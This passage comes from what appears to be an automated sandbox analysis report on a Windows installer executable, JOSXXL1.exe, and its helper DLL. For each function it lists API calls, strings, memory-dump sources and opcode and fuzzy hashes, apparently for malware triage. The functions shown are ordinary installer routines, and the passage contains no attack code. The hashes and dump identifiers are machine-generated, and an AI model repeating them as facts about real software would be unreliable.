                                                                                                        • Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                        • Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
                                                                                                        • Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                        • Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD
                                                                                                        Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                        • wsprintfW.USER32 ref: 00402D56
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                        • Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                        • Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
                                                                                                        • Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                        • Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59
                                                                                                        Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1780285237-0
                                                                                                        • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                        • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                        • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                        • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                        Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                        • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2667972263-0
                                                                                                        • Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                        • Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
                                                                                                        • Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                        • Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98
                                                                                                        Function 00404A9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                        • wsprintfW.USER32 ref: 00404B48
                                                                                                        • SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                        • String ID: %u.%u%s%s$H7B
                                                                                                        • API String ID: 3540041739-107966168
                                                                                                        • Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                        • Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
                                                                                                        • Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                        • Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC
                                                                                                        Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nstA69B.tmp$C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll
                                                                                                        • API String ID: 3109718747-3777108490
                                                                                                        • Opcode ID: 3ab53c3933776d76c7f2c2ac7c1e0b1a1d8adc62f327ac9952a723d0079f359d
                                                                                                        • Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
                                                                                                        • Opcode Fuzzy Hash: 3ab53c3933776d76c7f2c2ac7c1e0b1a1d8adc62f327ac9952a723d0079f359d
                                                                                                        • Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E
                                                                                                        Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2979337801-0
                                                                                                        • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                        • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                        • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                        • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                        Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                        • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1148316912-0
                                                                                                        • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                        • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                        • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                        • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                        Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1849352358-0
                                                                                                        • Opcode ID: 7b3c78611eb50acad670062cf6797ddfdf95dba70f5aba5ea4f5b4857e7d98af
                                                                                                        • Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
                                                                                                        • Opcode Fuzzy Hash: 7b3c78611eb50acad670062cf6797ddfdf95dba70f5aba5ea4f5b4857e7d98af
                                                                                                        • Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38
                                                                                                        Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Timeout
                                                                                                        • String ID: !
                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                        • Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                        • Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
                                                                                                        • Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                        • Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769
                                                                                                        Function 00406050 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040607A
                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040609B
                                                                                                        • RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 004060BE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID: Call
                                                                                                        • API String ID: 3677997916-1824292864
                                                                                                        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                        • Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
                                                                                                        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                        • Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6
                                                                                                        Function 00405BE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405BF0
                                                                                                        • CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                        • CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                        Strings
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext
                                                                                                        • String ID: Error writing temporary file. Make sure your temp folder is valid.
                                                                                                        • API String ID: 3213498283-4064111799
                                                                                                        • Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                        • Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
                                                                                                        • Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                        • Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9
                                                                                                        Function 00405B37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B3D
